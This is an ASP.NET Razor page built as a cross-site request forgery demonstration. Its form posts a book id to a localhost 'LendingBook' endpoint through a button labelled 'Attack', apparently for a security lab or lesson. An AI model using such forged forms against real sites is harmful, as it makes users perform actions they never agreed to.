
@{
    Layout = null;
}

<!DOCTYPE html>

<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>Index</title>
    <link href="~/css/style.css" rel="stylesheet" />
</head>
<body>
    <h1>Cross-Site Request Forgery Attack</h1>
    <h3>Click - Submit to Perform the Book Borrowing Attack</h3>
    <form action="https://localhost:7143/Home/LendingBook" method="post">
        <input name="id" type="number" value="2" />
        <input type="submit" value="Attack">
    </form>
</body>
</html>
